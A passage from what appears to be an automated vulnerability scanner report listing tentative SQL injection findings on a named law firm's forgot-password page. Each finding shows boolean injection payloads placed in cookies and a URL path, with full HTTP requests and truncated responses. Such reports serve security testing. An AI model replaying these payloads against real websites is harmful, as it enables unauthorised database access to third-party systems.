_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.46. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 19507347'%20or%201%3d1--%20 and 19507347'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19507347'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 17:53:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19507347'%20or%201%3d2--%20; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.47. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCONNECTID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 16640643'%20or%201%3d1--%20 and 16640643'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=16640643'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 17:53:00 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=16640643'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.48. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 12194880'%20or%201%3d1--%20 and 12194880'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=12194880'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 17:53:05 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=12194880'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.49. http://www.pillsburylaw.com/connect_forgotpassword.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15566183'%20or%201%3d1--%20 and 15566183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm15566183'%20or%201%3d1--%20?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /connect_forgotpassword.cfm15566183'%20or%201%3d2--%20?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.50. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 12242310'%20or%201%3d1--%20 and 12242310'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312242310'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 17:52:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
